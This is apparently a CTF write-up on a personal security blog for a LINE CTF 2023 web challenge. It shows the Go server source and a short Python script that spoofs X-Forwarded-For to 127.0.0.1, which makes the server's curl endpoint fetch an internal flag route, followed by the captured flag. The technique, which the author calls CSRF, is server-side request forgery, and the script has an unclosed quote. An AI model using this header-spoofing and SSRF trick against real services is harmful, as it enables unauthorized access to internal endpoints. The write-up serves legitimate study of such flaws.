2023. 3. 26. 12:20ㆍ정보보안/CTFLOG
When start line ctf, I confirmed the chall at first.
If you click the CURL button, then curl request and http request are sending
and showing your IP address.
Well then, check the code
package main
import (
"errors"
"fmt"
"io/ioutil"
"log"
"net/http"
"os"
"strings"
"github.com/gin-gonic/gin"
)
func redirectChecker(req *http.Request, via []*http.Request) error {
reqIp := strings.Split(via[len(via)-1].Host, ":")[0]
if len(via) >= 2 || reqIp != "127.0.0.1" {
return errors.New("Something wrong")
}
return nil
}
func main() {
flag := os.Getenv("FLAG")
r := gin.Default()
r.LoadHTMLGlob("view/*.html")
r.Static("/static", "./static")
r.GET("/", func(c *gin.Context) {
c.HTML(http.StatusOK, "index.html", gin.H{
"a": c.ClientIP(),
})
})
r.GET("/curl/", func(c *gin.Context) {
client := &http.Client{
CheckRedirect: func(req *http.Request, via []*http.Request) error {
return redirectChecker(req, via)
},
}
reqUrl := strings.ToLower(c.Query("url"))
reqHeaderKey := c.Query("header_key")
reqHeaderValue := c.Query("header_value")
reqIP := strings.Split(c.Request.RemoteAddr, ":")[0]
fmt.Println("[+] " + reqUrl + ", " + reqIP + ", " + reqHeaderKey + ", " + reqHeaderValue)
if c.ClientIP() != "127.0.0.1" && (strings.Contains(reqUrl, "flag") || strings.Contains(reqUrl, "curl") || strings.Contains(reqUrl, "%")) {
c.JSON(http.StatusBadRequest, gin.H{"message": "Something wrong"})
return
}
req, err := http.NewRequest("GET", reqUrl, nil)
if err != nil {
c.JSON(http.StatusBadRequest, gin.H{"message": "Something wrong"})
return
}
if reqHeaderKey != "" || reqHeaderValue != "" {
req.Header.Set(reqHeaderKey, reqHeaderValue)
}
resp, err := client.Do(req)
if err != nil {
c.JSON(http.StatusBadRequest, gin.H{"message": "Something wrong"})
return
}
defer resp.Body.Close()
bodyText, err := ioutil.ReadAll(resp.Body)
if err != nil {
c.JSON(http.StatusBadRequest, gin.H{"message": "Something wrong"})
return
}
statusText := resp.Status
c.JSON(http.StatusOK, gin.H{
"body": string(bodyText),
"status": statusText,
})
})
r.GET("/flag/", func(c *gin.Context) {
reqIP := strings.Split(c.Request.RemoteAddr, ":")[0]
log.Println("[+] IP : " + reqIP)
if reqIP == "127.0.0.1" {
c.JSON(http.StatusOK, gin.H{
"message": flag,
})
return
}
c.JSON(http.StatusBadRequest, gin.H{
"message": "You are a Guest, This is only for Host",
})
})
r.Run()
}main source code made by golang
I don't know well..
bottom line of the code, you can find if your IP address is "127.0.0.1" you can get the flag
But this app is verified your requests.
1. If your ip is not '127.0.0.1' then, print "something wrong"
2. If your reqUrl has 'flag' or 'curl' or '%' print "something wrong"
In this condition you would have noticed
you need to know CSRF.
You can think of it like this.
http://34.146.230.233:11000/curl/?url=http://127.0.0.1/flag/
but this URI will be filtered because of /flag/(This is to prevent endpoint access to the internal network)
so, you need to cheet this
before it, you need to learn about X-forwarded-for header
X-Forwarded-For(XFF) 란?
X-Forwarded-For(XFF) 란? XFF 는 HTTP Header 중 하나로 HTTP Server 에 요청한 Client 의 IP 를 식별하기 위한 표준입니다. 웹 서버나 WAS 앞에 L4 같은 Load balancers 나 Proxy server, caching server 등의 장비가 있을 경우
blog.plura.io
Now you know about X-forwarded-For header
and you can make your IP is 127.0.0.1 when server check out your reqUrl also..
import requests
url = 'http://34.146.230.233:11000/curl'
params = '/?url=http://127.0.0.1:8080/flag/'
headers = {
"X-Forwarded-For" : '127.0.0.1',
"Host" : '127.0.0.1
}
res = requests.get(url+params,headers=headers)
print(res.text)(I didn't know, and I made it with a host, but the host seems unnecessary.)
{"body":"{\"message\":\"= LINECTF{6a22ff56112a69f9ba1bfb4e20da5587}\"}","status":"200 OK"}LINECTF{6a22ff56112a69f9ba1bfb4e20da5587}
'정보보안 > CTFLOG' 카테고리의 다른 글
| [CTF] GreyCTF'23 write up (0) | 2023.05.22 |
|---|---|
| [CTF] LINE CTF 2023 - old pal (0) | 2023.03.26 |
| [CTF] B01ler_ctf - voidciphr (0) | 2023.03.20 |
| [CTF] LOGCON - warmup (0) | 2023.01.17 |
| [CTF] SECCON CTF 2022 - skipinx (0) | 2022.11.13 |